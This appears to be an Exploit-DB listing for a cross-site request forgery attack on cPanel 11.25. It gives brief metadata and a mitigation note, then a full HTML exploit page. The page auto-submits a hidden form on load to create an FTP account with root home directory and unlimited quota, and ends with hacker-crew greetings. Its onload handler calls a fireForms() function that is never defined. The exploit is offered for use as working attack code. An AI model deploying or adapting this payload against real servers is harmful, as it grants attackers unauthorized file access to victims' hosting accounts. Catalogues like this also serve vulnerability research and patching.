Cpanel 11.25 - [CSRF] Add FTP Account

vendor:

Cpanel

by:

G0D-F4Th3r

8,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: Cpanel

Affected Version From: 11.25

Affected Version To: 11.25

Patch Exists: NO

Related CWE: N/A

CPE: a:cpanel:cpanel

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Cpanel 11.25 – [CSRF] Add FTP Account

This exploit allows an attacker to add an FTP account to a Cpanel 11.25 server. The attacker can craft a malicious HTML page with a form containing the necessary parameters to add an FTP account. When a user visits the malicious page, the form will be automatically submitted and the FTP account will be added.

Mitigation:

Implementing CSRF protection mechanisms such as SameSite cookies, token-based CSRF protection, and CAPTCHA validation.

Source

Exploit-DB raw data:

# Exploit Title: Cpanel 11.25 - [CSRF] Add FTP Account
# Author: G0D-F4Th3r
# Software Link: http://www.cpanel.net/
# Version: 11.25

#######################Exploit#######################################
<html>
<body onload="javascript:fireForms()">
<form method="POST" name="form0" action="
http://server:2082/frontend/x3/ftp/doaddftp.html">
<input type="hidden" name="login" value="name"/>
<input type="hidden" name="password" value="pass"/>
<input type="hidden" name="password2" value="pass"/>
<input type="hidden" name="homedir" value="/"/>
<input type="hidden" name="quota" value="unlimited"/>
</form>
</body>
</html>
###########################################################################
Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My
Friends
###########################################################################